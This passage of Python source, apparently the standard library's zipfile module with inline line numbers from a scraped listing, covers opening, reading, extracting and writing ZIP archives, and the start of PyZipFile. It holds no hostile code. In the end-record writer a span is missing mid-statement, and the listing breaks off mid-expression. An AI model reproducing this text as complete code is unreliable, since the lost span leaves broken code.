"metadata_encoding is only supported for reading files") 1304 | 1305 | # Check if we were passed a file-like object 1306 | if isinstance(file, os.PathLike): 1307 | file = os.fspath(file) 1308 | if isinstance(file, str): 1309 | # No, it's a filename 1310 | self._filePassed = 0 1311 | self.filename = file 1312 | modeDict = {'r' : 'rb', 'w': 'w+b', 'x': 'x+b', 'a' : 'r+b', 1313 | 'r+b': 'w+b', 'w+b': 'wb', 'x+b': 'xb'} 1314 | filemode = modeDict[mode] 1315 | while True: 1316 | try: 1317 | self.fp = io.open(file, filemode) 1318 | except OSError: 1319 | if filemode in modeDict: 1320 | filemode = modeDict[filemode] 1321 | continue 1322 | raise 1323 | break 1324 | else: 1325 | self._filePassed = 1 1326 | self.fp = file 1327 | self.filename = getattr(file, 'name', None) 1328 | self._fileRefCnt = 1 1329 | self._lock = threading.RLock() 1330 | self._seekable = True 1331 | self._writing = False 1332 | 1333 | try: 1334 | if mode == 'r': 1335 | self._RealGetContents() 1336 | elif mode in ('w', 'x'): 1337 | # set the modified flag so central directory gets written 1338 | # even if no files are added to the archive 1339 | self._didModify = True 1340 | try: 1341 | self.start_dir = self.fp.tell() 1342 | except (AttributeError, OSError): 1343 | self.fp = _Tellable(self.fp) 1344 | self.start_dir = 0 1345 | self._seekable = False 1346 | else: 1347 | # Some file-like objects can provide tell() but not seek() 1348 | try: 1349 | self.fp.seek(self.start_dir) 1350 | except (AttributeError, OSError): 1351 | self._seekable = False 1352 | elif mode == 'a': 1353 | try: 1354 | # See if file is a zip file 1355 | self._RealGetContents() 1356 | # seek to start of directory and overwrite 1357 | self.fp.seek(self.start_dir) 1358 | except BadZipFile: 1359 | # file is not a zip file, just append 1360 | self.fp.seek(0, 2) 1361 | 1362 | # set the modified flag so central directory gets written 1363 | # even if no files are added to the archive 1364 | self._didModify = True 1365 | self.start_dir = 
                        self.fp.tell()
            else:
                raise ValueError("Mode must be 'r', 'w', 'x', or 'a'")
        except:
            # Construction failed: close the underlying file before
            # re-raising so the caller does not leak a handle.
            fp = self.fp
            self.fp = None
            self._fpclose(fp)
            raise

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.close()

    def __repr__(self):
        result = ['<%s.%s' % (self.__class__.__module__,
                              self.__class__.__qualname__)]
        if self.fp is not None:
            if self._filePassed:
                result.append(' file=%r' % self.fp)
            elif self.filename is not None:
                result.append(' filename=%r' % self.filename)
            result.append(' mode=%r' % self.mode)
        else:
            result.append(' [closed]')
        result.append('>')
        return ''.join(result)

    def _RealGetContents(self):
        """Read in the table of contents for the ZIP file."""
        fp = self.fp
        try:
            endrec = _EndRecData(fp)
        except OSError:
            raise BadZipFile("File is not a zip file")
        if not endrec:
            raise BadZipFile("File is not a zip file")
        if self.debug > 1:
            print(endrec)
        size_cd = endrec[_ECD_SIZE]             # bytes in central directory
        offset_cd = endrec[_ECD_OFFSET]         # offset of central directory
        self._comment = endrec[_ECD_COMMENT]    # archive comment

        # "concat" is zero, unless zip was concatenated to another file
        concat = endrec[_ECD_LOCATION] - size_cd - offset_cd
        if endrec[_ECD_SIGNATURE] == stringEndArchive64:
            # If Zip64 extension structures are present, account for them
            concat -= (sizeEndCentDir64 + sizeEndCentDir64Locator)

        if self.debug > 2:
            inferred = concat + offset_cd
            print("given, inferred, offset", offset_cd, inferred, concat)
        # self.start_dir:  Position of start of central directory
        self.start_dir = offset_cd + concat
        if self.start_dir < 0:
            raise BadZipFile("Bad offset for central directory")
        fp.seek(self.start_dir, 0)
        data = fp.read(size_cd)
        # Parse the in-memory copy of the central directory.
        fp = io.BytesIO(data)
        total = 0
        while total < size_cd:
            centdir = fp.read(sizeCentralDir)
            if len(centdir) != sizeCentralDir:
                raise BadZipFile("Truncated central directory")
            centdir = struct.unpack(structCentralDir, centdir)
            if centdir[_CD_SIGNATURE] != stringCentralDir:
                raise BadZipFile("Bad magic number for central directory")
            if self.debug > 2:
                print(centdir)
            filename = fp.read(centdir[_CD_FILENAME_LENGTH])
            # CRC of the raw name bytes, used to validate the 0x7075
            # unicode-path extra field in _decodeExtra().
            orig_filename_crc = crc32(filename)
            flags = centdir[_CD_FLAG_BITS]
            if flags & _MASK_UTF_FILENAME:
                # UTF-8 file names extension
                filename = filename.decode('utf-8')
            else:
                # Historical ZIP filename encoding
                filename = filename.decode(self.metadata_encoding or 'cp437')
            # Create ZipInfo instance to store file information
            x = ZipInfo(filename)
            x.extra = fp.read(centdir[_CD_EXTRA_FIELD_LENGTH])
            x.comment = fp.read(centdir[_CD_COMMENT_LENGTH])
            x.header_offset = centdir[_CD_LOCAL_HEADER_OFFSET]
            (x.create_version, x.create_system, x.extract_version, x.reserved,
             x.flag_bits, x.compress_type, t, d,
             x.CRC, x.compress_size, x.file_size) = centdir[1:12]
            if x.extract_version > MAX_EXTRACT_VERSION:
                raise NotImplementedError("zip file version %.1f" %
                                          (x.extract_version / 10))
            x.volume, x.internal_attr, x.external_attr = centdir[15:18]
            # Convert date/time code to (year, month, day, hour, min, sec)
            x._raw_time = t
            x.date_time = ( (d>>9)+1980, (d>>5)&0xF, d&0x1F,
                            t>>11, (t>>5)&0x3F, (t&0x1F) * 2 )
            x._decodeExtra(orig_filename_crc)
            x.header_offset = x.header_offset + concat
            self.filelist.append(x)
            self.NameToInfo[x.filename] = x

            # update total bytes read from central directory
            total = (total + sizeCentralDir +
                     centdir[_CD_FILENAME_LENGTH]
                     + centdir[_CD_EXTRA_FIELD_LENGTH]
                     + centdir[_CD_COMMENT_LENGTH])

        if self.debug > 2:
            print("total", total)


    def namelist(self):
        """Return a list of file names in the archive."""
        return [data.filename for data in self.filelist]

    def infolist(self):
        """Return a list of class ZipInfo instances for files in the
        archive."""
        return self.filelist

    def printdir(self, file=None):
        """Print a table of contents for the zip file."""
        print("%-46s %19s %12s" % ("File Name", "Modified    ", "Size"),
              file=file)
        for zinfo in self.filelist:
            date = "%d-%02d-%02d %02d:%02d:%02d" % zinfo.date_time[:6]
            print("%-46s %s %12d" % (zinfo.filename, date, zinfo.file_size),
                  file=file)

    def testzip(self):
        """Read all the files and check the CRC.

        Return None if all files could be read successfully, or the name
        of the offending file otherwise."""
        chunk_size = 2 ** 20
        for zinfo in self.filelist:
            try:
                # Read by chunks, to avoid an OverflowError or a
                # MemoryError with very large embedded files.
1502 | with self.open(zinfo.filename, "r") as f: 1503 | while f.read(chunk_size): # Check CRC-32 1504 | pass 1505 | except BadZipFile: 1506 | return zinfo.filename 1507 | 1508 | def getinfo(self, name): 1509 | """Return the instance of ZipInfo given 'name'.""" 1510 | info = self.NameToInfo.get(name) 1511 | if info is None: 1512 | raise KeyError( 1513 | 'There is no item named %r in the archive' % name) 1514 | 1515 | return info 1516 | 1517 | def setpassword(self, pwd): 1518 | """Set default password for encrypted files.""" 1519 | if pwd and not isinstance(pwd, bytes): 1520 | raise TypeError("pwd: expected bytes, got %s" % type(pwd).__name__) 1521 | if pwd: 1522 | self.pwd = pwd 1523 | else: 1524 | self.pwd = None 1525 | 1526 | @property 1527 | def comment(self): 1528 | """The comment text associated with the ZIP file.""" 1529 | return self._comment 1530 | 1531 | @comment.setter 1532 | def comment(self, comment): 1533 | if not isinstance(comment, bytes): 1534 | raise TypeError("comment: expected bytes, got %s" % type(comment).__name__) 1535 | # check for valid comment length 1536 | if len(comment) > ZIP_MAX_COMMENT: 1537 | import warnings 1538 | warnings.warn('Archive comment is too long; truncating to %d bytes' 1539 | % ZIP_MAX_COMMENT, stacklevel=2) 1540 | comment = comment[:ZIP_MAX_COMMENT] 1541 | self._comment = comment 1542 | self._didModify = True 1543 | 1544 | def read(self, name, pwd=None): 1545 | """Return file bytes for name.""" 1546 | with self.open(name, "r", pwd) as fp: 1547 | return fp.read() 1548 | 1549 | def open(self, name, mode="r", pwd=None, *, force_zip64=False): 1550 | """Return file-like object for 'name'. 1551 | 1552 | name is a string for the file name within the ZIP file, or a ZipInfo 1553 | object. 1554 | 1555 | mode should be 'r' to read a file already in the ZIP file, or 'w' to 1556 | write to a file newly added to the archive. 1557 | 1558 | pwd is the password to decrypt files (only used for reading). 
1559 | 1560 | When writing, if the file size is not known in advance but may exceed 1561 | 2 GiB, pass force_zip64 to use the ZIP64 format, which can handle large 1562 | files. If the size is known in advance, it is best to pass a ZipInfo 1563 | instance for name, with zinfo.file_size set. 1564 | """ 1565 | if mode not in {"r", "w"}: 1566 | raise ValueError('open() requires mode "r" or "w"') 1567 | if pwd and (mode == "w"): 1568 | raise ValueError("pwd is only supported for reading files") 1569 | if not self.fp: 1570 | raise ValueError( 1571 | "Attempt to use ZIP archive that was already closed") 1572 | 1573 | # Make sure we have an info object 1574 | if isinstance(name, ZipInfo): 1575 | # 'name' is already an info object 1576 | zinfo = name 1577 | elif mode == 'w': 1578 | zinfo = ZipInfo(name) 1579 | zinfo.compress_type = self.compression 1580 | zinfo._compresslevel = self.compresslevel 1581 | else: 1582 | # Get info object for name 1583 | zinfo = self.getinfo(name) 1584 | 1585 | if mode == 'w': 1586 | return self._open_to_write(zinfo, force_zip64=force_zip64) 1587 | 1588 | if self._writing: 1589 | raise ValueError("Can't read from the ZIP file while there " 1590 | "is an open writing handle on it. 
" 1591 | "Close the writing handle before trying to read.") 1592 | 1593 | # Open for reading: 1594 | self._fileRefCnt += 1 1595 | zef_file = _SharedFile(self.fp, zinfo.header_offset, 1596 | self._fpclose, self._lock, lambda: self._writing) 1597 | try: 1598 | # Skip the file header: 1599 | fheader = zef_file.read(sizeFileHeader) 1600 | if len(fheader) != sizeFileHeader: 1601 | raise BadZipFile("Truncated file header") 1602 | fheader = struct.unpack(structFileHeader, fheader) 1603 | if fheader[_FH_SIGNATURE] != stringFileHeader: 1604 | raise BadZipFile("Bad magic number for file header") 1605 | 1606 | fname = zef_file.read(fheader[_FH_FILENAME_LENGTH]) 1607 | if fheader[_FH_EXTRA_FIELD_LENGTH]: 1608 | zef_file.seek(fheader[_FH_EXTRA_FIELD_LENGTH], whence=1) 1609 | 1610 | if zinfo.flag_bits & _MASK_COMPRESSED_PATCH: 1611 | # Zip 2.7: compressed patched data 1612 | raise NotImplementedError("compressed patched data (flag bit 5)") 1613 | 1614 | if zinfo.flag_bits & _MASK_STRONG_ENCRYPTION: 1615 | # strong encryption 1616 | raise NotImplementedError("strong encryption (flag bit 6)") 1617 | 1618 | if fheader[_FH_GENERAL_PURPOSE_FLAG_BITS] & _MASK_UTF_FILENAME: 1619 | # UTF-8 filename 1620 | fname_str = fname.decode("utf-8") 1621 | else: 1622 | fname_str = fname.decode(self.metadata_encoding or "cp437") 1623 | 1624 | if fname_str != zinfo.orig_filename: 1625 | raise BadZipFile( 1626 | 'File name in directory %r and header %r differ.' 
1627 | % (zinfo.orig_filename, fname)) 1628 | 1629 | # check for encrypted flag & handle password 1630 | is_encrypted = zinfo.flag_bits & _MASK_ENCRYPTED 1631 | if is_encrypted: 1632 | if not pwd: 1633 | pwd = self.pwd 1634 | if pwd and not isinstance(pwd, bytes): 1635 | raise TypeError("pwd: expected bytes, got %s" % type(pwd).__name__) 1636 | if not pwd: 1637 | raise RuntimeError("File %r is encrypted, password " 1638 | "required for extraction" % name) 1639 | else: 1640 | pwd = None 1641 | 1642 | return ZipExtFile(zef_file, mode, zinfo, pwd, True) 1643 | except: 1644 | zef_file.close() 1645 | raise 1646 | 1647 | def _open_to_write(self, zinfo, force_zip64=False): 1648 | if force_zip64 and not self._allowZip64: 1649 | raise ValueError( 1650 | "force_zip64 is True, but allowZip64 was False when opening " 1651 | "the ZIP file." 1652 | ) 1653 | if self._writing: 1654 | raise ValueError("Can't write to the ZIP file while there is " 1655 | "another write handle open on it. " 1656 | "Close the first handle before opening another.") 1657 | 1658 | # Size and CRC are overwritten with correct data after processing the file 1659 | zinfo.compress_size = 0 1660 | zinfo.CRC = 0 1661 | 1662 | zinfo.flag_bits = 0x00 1663 | if zinfo.compress_type == ZIP_LZMA: 1664 | # Compressed data includes an end-of-stream (EOS) marker 1665 | zinfo.flag_bits |= _MASK_COMPRESS_OPTION_1 1666 | if not self._seekable: 1667 | zinfo.flag_bits |= _MASK_USE_DATA_DESCRIPTOR 1668 | 1669 | if not zinfo.external_attr: 1670 | zinfo.external_attr = 0o600 << 16 # permissions: ?rw------- 1671 | 1672 | # Compressed size can be larger than uncompressed size 1673 | zip64 = self._allowZip64 and \ 1674 | (force_zip64 or zinfo.file_size * 1.05 > ZIP64_LIMIT) 1675 | 1676 | if self._seekable: 1677 | self.fp.seek(self.start_dir) 1678 | zinfo.header_offset = self.fp.tell() 1679 | 1680 | self._writecheck(zinfo) 1681 | self._didModify = True 1682 | 1683 | self.fp.write(zinfo.FileHeader(zip64)) 1684 | 1685 | self._writing 
= True 1686 | return _ZipWriteFile(self, zinfo, zip64) 1687 | 1688 | def extract(self, member, path=None, pwd=None): 1689 | """Extract a member from the archive to the current working directory, 1690 | using its full name. Its file information is extracted as accurately 1691 | as possible. `member' may be a filename or a ZipInfo object. You can 1692 | specify a different directory using `path'. 1693 | """ 1694 | if path is None: 1695 | path = os.getcwd() 1696 | else: 1697 | path = os.fspath(path) 1698 | 1699 | return self._extract_member(member, path, pwd) 1700 | 1701 | def extractall(self, path=None, members=None, pwd=None): 1702 | """Extract all members from the archive to the current working 1703 | directory. `path' specifies a different directory to extract to. 1704 | `members' is optional and must be a subset of the list returned 1705 | by namelist(). 1706 | """ 1707 | if members is None: 1708 | members = self.namelist() 1709 | 1710 | if path is None: 1711 | path = os.getcwd() 1712 | else: 1713 | path = os.fspath(path) 1714 | 1715 | for zipinfo in members: 1716 | self._extract_member(zipinfo, path, pwd) 1717 | 1718 | @classmethod 1719 | def _sanitize_windows_name(cls, arcname, pathsep): 1720 | """Replace bad characters and remove trailing dots from parts.""" 1721 | table = cls._windows_illegal_name_trans_table 1722 | if not table: 1723 | illegal = ':<>|"?*' 1724 | table = str.maketrans(illegal, '_' * len(illegal)) 1725 | cls._windows_illegal_name_trans_table = table 1726 | arcname = arcname.translate(table) 1727 | # remove trailing dots and spaces 1728 | arcname = (x.rstrip(' .') for x in arcname.split(pathsep)) 1729 | # rejoin, removing empty parts. 1730 | arcname = pathsep.join(x for x in arcname if x) 1731 | return arcname 1732 | 1733 | def _extract_member(self, member, targetpath, pwd): 1734 | """Extract the ZipInfo object 'member' to a physical 1735 | file on the path targetpath. 
1736 | """ 1737 | if not isinstance(member, ZipInfo): 1738 | member = self.getinfo(member) 1739 | 1740 | # build the destination pathname, replacing 1741 | # forward slashes to platform specific separators. 1742 | arcname = member.filename.replace('/', os.path.sep) 1743 | 1744 | if os.path.altsep: 1745 | arcname = arcname.replace(os.path.altsep, os.path.sep) 1746 | # interpret absolute pathname as relative, remove drive letter or 1747 | # UNC path, redundant separators, "." and ".." components. 1748 | arcname = os.path.splitdrive(arcname)[1] 1749 | invalid_path_parts = ('', os.path.curdir, os.path.pardir) 1750 | arcname = os.path.sep.join(x for x in arcname.split(os.path.sep) 1751 | if x not in invalid_path_parts) 1752 | if os.path.sep == '\\': 1753 | # filter illegal characters on Windows 1754 | arcname = self._sanitize_windows_name(arcname, os.path.sep) 1755 | 1756 | if not arcname: 1757 | raise ValueError("Empty filename.") 1758 | 1759 | targetpath = os.path.join(targetpath, arcname) 1760 | targetpath = os.path.normpath(targetpath) 1761 | 1762 | # Create all upper directories if necessary. 
1763 | upperdirs = os.path.dirname(targetpath) 1764 | if upperdirs and not os.path.exists(upperdirs): 1765 | os.makedirs(upperdirs) 1766 | 1767 | if member.is_dir(): 1768 | if not os.path.isdir(targetpath): 1769 | os.mkdir(targetpath) 1770 | return targetpath 1771 | 1772 | with self.open(member, pwd=pwd) as source, \ 1773 | open(targetpath, "wb") as target: 1774 | shutil.copyfileobj(source, target) 1775 | 1776 | return targetpath 1777 | 1778 | def _writecheck(self, zinfo): 1779 | """Check for errors before writing a file to the archive.""" 1780 | if zinfo.filename in self.NameToInfo: 1781 | import warnings 1782 | warnings.warn('Duplicate name: %r' % zinfo.filename, stacklevel=3) 1783 | if self.mode not in ('w', 'x', 'a'): 1784 | raise ValueError("write() requires mode 'w', 'x', or 'a'") 1785 | if not self.fp: 1786 | raise ValueError( 1787 | "Attempt to write ZIP archive that was already closed") 1788 | _check_compression(zinfo.compress_type) 1789 | if not self._allowZip64: 1790 | requires_zip64 = None 1791 | if len(self.filelist) >= ZIP_FILECOUNT_LIMIT: 1792 | requires_zip64 = "Files count" 1793 | elif zinfo.file_size > ZIP64_LIMIT: 1794 | requires_zip64 = "Filesize" 1795 | elif zinfo.header_offset > ZIP64_LIMIT: 1796 | requires_zip64 = "Zipfile size" 1797 | if requires_zip64: 1798 | raise LargeZipFile(requires_zip64 + 1799 | " would require ZIP64 extensions") 1800 | 1801 | def write(self, filename, arcname=None, 1802 | compress_type=None, compresslevel=None): 1803 | """Put the bytes from filename into the archive under the name 1804 | arcname.""" 1805 | if not self.fp: 1806 | raise ValueError( 1807 | "Attempt to write to ZIP archive that was already closed") 1808 | if self._writing: 1809 | raise ValueError( 1810 | "Can't write to ZIP archive while an open writing handle exists" 1811 | ) 1812 | 1813 | zinfo = ZipInfo.from_file(filename, arcname, 1814 | strict_timestamps=self._strict_timestamps) 1815 | 1816 | if zinfo.is_dir(): 1817 | zinfo.compress_size = 0 1818 | 
zinfo.CRC = 0 1819 | self.mkdir(zinfo) 1820 | else: 1821 | if compress_type is not None: 1822 | zinfo.compress_type = compress_type 1823 | else: 1824 | zinfo.compress_type = self.compression 1825 | 1826 | if compresslevel is not None: 1827 | zinfo._compresslevel = compresslevel 1828 | else: 1829 | zinfo._compresslevel = self.compresslevel 1830 | 1831 | with open(filename, "rb") as src, self.open(zinfo, 'w') as dest: 1832 | shutil.copyfileobj(src, dest, 1024*8) 1833 | 1834 | def writestr(self, zinfo_or_arcname, data, 1835 | compress_type=None, compresslevel=None): 1836 | """Write a file into the archive. The contents is 'data', which 1837 | may be either a 'str' or a 'bytes' instance; if it is a 'str', 1838 | it is encoded as UTF-8 first. 1839 | 'zinfo_or_arcname' is either a ZipInfo instance or 1840 | the name of the file in the archive.""" 1841 | if isinstance(data, str): 1842 | data = data.encode("utf-8") 1843 | if not isinstance(zinfo_or_arcname, ZipInfo): 1844 | zinfo = ZipInfo(filename=zinfo_or_arcname, 1845 | date_time=time.localtime(time.time())[:6]) 1846 | zinfo.compress_type = self.compression 1847 | zinfo._compresslevel = self.compresslevel 1848 | if zinfo.filename.endswith('/'): 1849 | zinfo.external_attr = 0o40775 << 16 # drwxrwxr-x 1850 | zinfo.external_attr |= 0x10 # MS-DOS directory flag 1851 | else: 1852 | zinfo.external_attr = 0o600 << 16 # ?rw------- 1853 | else: 1854 | zinfo = zinfo_or_arcname 1855 | 1856 | if not self.fp: 1857 | raise ValueError( 1858 | "Attempt to write to ZIP archive that was already closed") 1859 | if self._writing: 1860 | raise ValueError( 1861 | "Can't write to ZIP archive while an open writing handle exists." 
1862 | ) 1863 | 1864 | if compress_type is not None: 1865 | zinfo.compress_type = compress_type 1866 | 1867 | if compresslevel is not None: 1868 | zinfo._compresslevel = compresslevel 1869 | 1870 | zinfo.file_size = len(data) # Uncompressed size 1871 | with self._lock: 1872 | with self.open(zinfo, mode='w') as dest: 1873 | dest.write(data) 1874 | 1875 | def mkdir(self, zinfo_or_directory_name, mode=511): 1876 | """Creates a directory inside the zip archive.""" 1877 | if isinstance(zinfo_or_directory_name, ZipInfo): 1878 | zinfo = zinfo_or_directory_name 1879 | if not zinfo.is_dir(): 1880 | raise ValueError("The given ZipInfo does not describe a directory") 1881 | elif isinstance(zinfo_or_directory_name, str): 1882 | directory_name = zinfo_or_directory_name 1883 | if not directory_name.endswith("/"): 1884 | directory_name += "/" 1885 | zinfo = ZipInfo(directory_name) 1886 | zinfo.compress_size = 0 1887 | zinfo.CRC = 0 1888 | zinfo.external_attr = ((0o40000 | mode) & 0xFFFF) << 16 1889 | zinfo.file_size = 0 1890 | zinfo.external_attr |= 0x10 1891 | else: 1892 | raise TypeError("Expected type str or ZipInfo") 1893 | 1894 | with self._lock: 1895 | if self._seekable: 1896 | self.fp.seek(self.start_dir) 1897 | zinfo.header_offset = self.fp.tell() # Start of header bytes 1898 | if zinfo.compress_type == ZIP_LZMA: 1899 | # Compressed data includes an end-of-stream (EOS) marker 1900 | zinfo.flag_bits |= _MASK_COMPRESS_OPTION_1 1901 | 1902 | self._writecheck(zinfo) 1903 | self._didModify = True 1904 | 1905 | self.filelist.append(zinfo) 1906 | self.NameToInfo[zinfo.filename] = zinfo 1907 | self.fp.write(zinfo.FileHeader(False)) 1908 | self.start_dir = self.fp.tell() 1909 | 1910 | def __del__(self): 1911 | """Call the "close()" method in case the user forgot.""" 1912 | self.close() 1913 | 1914 | def close(self): 1915 | """Close the file, and for mode 'w', 'x' and 'a' write the ending 1916 | records.""" 1917 | if self.fp is None: 1918 | return 1919 | 1920 | if self._writing: 
1921 | raise ValueError("Can't close the ZIP file while there is " 1922 | "an open writing handle on it. " 1923 | "Close the writing handle before closing the zip.") 1924 | 1925 | try: 1926 | if self.mode in ('w', 'x', 'a') and self._didModify: # write ending records 1927 | with self._lock: 1928 | if self._seekable: 1929 | self.fp.seek(self.start_dir) 1930 | self._write_end_record() 1931 | finally: 1932 | fp = self.fp 1933 | self.fp = None 1934 | self._fpclose(fp) 1935 | 1936 | def _write_end_record(self): 1937 | for zinfo in self.filelist: # write central directory 1938 | dt = zinfo.date_time 1939 | dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2] 1940 | dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2) 1941 | extra = [] 1942 | if zinfo.file_size > ZIP64_LIMIT \ 1943 | or zinfo.compress_size > ZIP64_LIMIT: 1944 | extra.append(zinfo.file_size) 1945 | extra.append(zinfo.compress_size) 1946 | file_size = 0xffffffff 1947 | compress_size = 0xffffffff 1948 | else: 1949 | file_size = zinfo.file_size 1950 | compress_size = zinfo.compress_size 1951 | 1952 | if zinfo.header_offset > ZIP64_LIMIT: 1953 | extra.append(zinfo.header_offset) 1954 | header_offset = 0xffffffff 1955 | else: 1956 | header_offset = zinfo.header_offset 1957 | 1958 | extra_data = zinfo.extra 1959 | min_version = 0 1960 | if extra: 1961 | # Append a ZIP64 field to the extra's 1962 | extra_data = _strip_extra(extra_data, (1,)) 1963 | extra_data = struct.pack( 1964 | ' ZIP_FILECOUNT_LIMIT: 1997 | requires_zip64 = "Files count" 1998 | elif centDirOffset > ZIP64_LIMIT: 1999 | requires_zip64 = "Central directory offset" 2000 | elif centDirSize > ZIP64_LIMIT: 2001 | requires_zip64 = "Central directory size" 2002 | if requires_zip64: 2003 | # Need to write the ZIP64 end-of-archive records 2004 | if not self._allowZip64: 2005 | raise LargeZipFile(requires_zip64 + 2006 | " would require ZIP64 extensions") 2007 | zip64endrec = struct.pack( 2008 | structEndArchive64, stringEndArchive64, 2009 | 44, 45, 45, 0, 0, 
centDirCount, centDirCount, 2010 | centDirSize, centDirOffset) 2011 | self.fp.write(zip64endrec) 2012 | 2013 | zip64locrec = struct.pack( 2014 | structEndArchive64Locator, 2015 | stringEndArchive64Locator, 0, pos2, 1) 2016 | self.fp.write(zip64locrec) 2017 | centDirCount = min(centDirCount, 0xFFFF) 2018 | centDirSize = min(centDirSize, 0xFFFFFFFF) 2019 | centDirOffset = min(centDirOffset, 0xFFFFFFFF) 2020 | 2021 | endrec = struct.pack(structEndArchive, stringEndArchive, 2022 | 0, 0, centDirCount, centDirCount, 2023 | centDirSize, centDirOffset, len(self._comment)) 2024 | self.fp.write(endrec) 2025 | self.fp.write(self._comment) 2026 | if self.mode == "a": 2027 | self.fp.truncate() 2028 | self.fp.flush() 2029 | 2030 | def _fpclose(self, fp): 2031 | assert self._fileRefCnt > 0 2032 | self._fileRefCnt -= 1 2033 | if not self._fileRefCnt and not self._filePassed: 2034 | fp.close() 2035 | 2036 | 2037 | class PyZipFile(ZipFile): 2038 | """Class to create ZIP archives with Python library files and packages.""" 2039 | 2040 | def __init__(self, file, mode="r", compression=ZIP_STORED, 2041 | allowZip64=True, optimize=-1): 2042 | ZipFile.__init__(self, file, mode=mode, compression=compression, 2043 | allowZip64=allowZip64) 2044 | self._optimize = optimize 2045 | 2046 | def writepy(self, pathname, basename="", filterfunc=None): 2047 | """Add all files from "pathname" to the ZIP archive. 2048 | 2049 | If pathname is a package directory, search the directory and 2050 | all package subdirectories recursively for all *.py and enter 2051 | the modules into the archive. If pathname is a plain 2052 | directory, listdir *.py and enter all modules. Else, pathname 2053 | must be a Python *.py file and the module will be put into the 2054 | archive. Added modules are always module.pyc. 2055 | This method will compile the module.py into module.pyc if 2056 | necessary. 2057 | If filterfunc(pathname) is given, it is called with every argument. 
2058 | When it is False, the file or directory is skipped. 2059 | """ 2060 | pathname = os.fspath(pathname) 2061 | if filterfunc and not filterfunc(pathname): 2062 | if self.debug: 2063 | label = 'path' if os.path.isdir(pathname) else 'file' 2064 | print('%s %r skipped by filterfunc' % (label, pathname)) 2065 | return 2066 | dir, name = os.path.split(pathname) 2067 | if os.path.isdir(pathname): 2068 | initname = os.path.join(pathname, "__init__.py") 2069 | if os.path.isfile(initname): 2070 | # This is a package directory, add it 2071 | if basename: 2072 | basename = "%s/%s" % (basename, name) 2073 | else: 2074 | basename = name 2075 | if self.debug: 2076 | print("Adding package in", pathname, "as", basename) 2077 | fname, arcname = self._get_codename(initname[0:-3], basename) 2078 | if self.debug: 2079 | print("Adding", arcname) 2080 | self.write(fname, arcname) 2081 | dirlist = sorted(os.listdir(pathname)) 2082 | dirlist.remove("__init__.py") 2083 | # Add all *.py files and package subdirectories 2084 | for filename in dirlist: 2085 | path = os.path.join(pathname, filename) 2086 | root, ext = os.path.splitext(filename) 2087 | if os.path.isdir(path): 2088 | if os.path.isfile(os.path.join(path, "__init__.py")): 2089 | # This is a package directory, add it 2090 | self.writepy(path, basename, 2091 | filterfunc=filterfunc) # Recursive call 2092 | elif ext == ".py": 2093 | if filterfunc and not filterfunc(path): 2094 | if self.debug: 2095 | print('file %r skipped by filterfunc' % path) 2096 | continue 2097 | fname, arcname = self._get_codename(path[0:-3], 2098 | basename) 2099 | if self.debug: 2100 | print("Adding", arcname) 2101 | self.write(fname, arcname) 2102 | else: 2103 | # This is NOT a package directory, add its files at top level 2104 | if self.debug: 2105 | print("Adding files from directory", pathname) 2106 | for filename in sorted(os.listdir(pathname)): 2107 | path = os.path.join(pathname, filename) 2108 | root, ext = os.path.splitext(filename) 2109 | if ext 
== ".py": 2110 | if filterfunc and not filterfunc(path): 2111 | if self.debug: 2112 | print('file %r skipped by filterfunc' % path) 2113 | continue 2114 | fname, arcname = self._get_codename(path[0:-3], 2115 | basename) 2116 | if self.debug: 2117 | print("Adding", arcname) 2118 | self.write(fname, arcname) 2119 | else: 2120 | if pathname[-3:] != ".py": 2121 | raise RuntimeError( 2122 | 'Files added with writepy() must end with ".py"') 2123 | fname, arcname = self._get_codename(pathname[0:-3], basename) 2124 | if self.debug: 2125 | print("Adding file", arcname) 2126 | self.write(fname, arcname) 2127 | 2128 | def _get_codename(self, pathname, basename): 2129 | """Return (filename, archivename) for the path. 2130 | 2131 | Given a module name path, return the correct file path and 2132 | archive name, compiling if necessary. For example, given 2133 | /python/lib/string, return (/python/lib/string.pyc, string). 2134 | """ 2135 | def _compile(file, optimize=-1): 2136 | import py_compile 2137 | if self.debug: 2138 | print("Compiling", file) 2139 | try: 2140 | py_compile.compile(file, doraise=True, optimize=optimize) 2141 | except py_compile.PyCompileError as err: 2142 | print(err.msg) 2143 | return False 2144 | return True 2145 | 2146 | file_py = pathname + ".py" 2147 | file_pyc = pathname + ".pyc" 2148 | pycache_opt0 = importlib.util.cache_from_source(file_py, optimization='') 2149 | pycache_opt1 = importlib.util.cache_from_source(file_py, optimization=1) 2150 | pycache_opt2 = importlib.util.cache_from_source(file_py, optimization=2) 2151 | if self._optimize == -1: 2152 | # legacy mode: use whatever file is present 2153 | if (os.path.isfile(file_pyc) and 2154 | os.stat(file_pyc).st_mtime >= os.stat(file_py).st_mtime): 2155 | # Use .pyc file. 
2156 | arcname = fname = file_pyc 2157 | elif (os.path.isfile(pycache_opt0) and 2158 | os.stat(pycache_opt0).st_mtime >= os.stat(file_py).st_mtime): 2159 | # Use the __pycache__/*.pyc file, but write it to the legacy pyc 2160 | # file name in the archive. 2161 | fname = pycache_opt0 2162 | arcname = file_pyc 2163 | elif (os.path.isfile(pycache_opt1) and 2164 | os.stat(pycache_opt1).st_mtime >= os.stat(file_py).st_mtime): 2165 | # Use the __pycache__/*.pyc file, but write it to the legacy pyc 2166 | # file name in the archive. 2167 | fname = pycache_opt1 2168 | arcname = file_pyc 2169 | elif (os.path.isfile(pycache_opt2) and 2170 | os.stat(pycache_opt2).st_mtime >= os.stat(file_py).st_mtime): 2171 | # Use the __pycache__/*.pyc file, but write it to the legacy pyc 2172 | # file name in the archive. 2173 | fname = pycache_opt2 2174 | arcname = file_pyc 2175 | else: 2176 | # Compile py into PEP 3147 pyc file. 2177 | if _compile(file_py): 2178 | if sys.flags.optimize == 0: 2179 | fname = pycache_opt0 2180 | elif sys.flags.optimize == 1: 2181 | fname = pycache_opt1 2182 | else: 2183 | fname = pycache_opt2 2184 | arcname = file_pyc 2185 | else: 2186 | fname = arcname = file_py 2187 | else: 2188 | # new mode: use given optimization level 2189 | if self._optimize == 0: 2190 | fname = pycache_opt0 2191 | arcname = file_pyc 2192 | else: 2193 | arcname = file_pyc 2194 | if self._optimize == 1: 2195 | fname = pycache_opt1 2196 | elif self._optimize == 2: 2197 | fname = pycache_opt2 2198 | else: 2199 | msg = "invalid value for 'optimize': {!r}".format(self._optimize) 2200 | raise ValueError(msg) 2201 | if not (os.path.isfile(fname) and 2202 | os.stat(fname).st_mtime >= 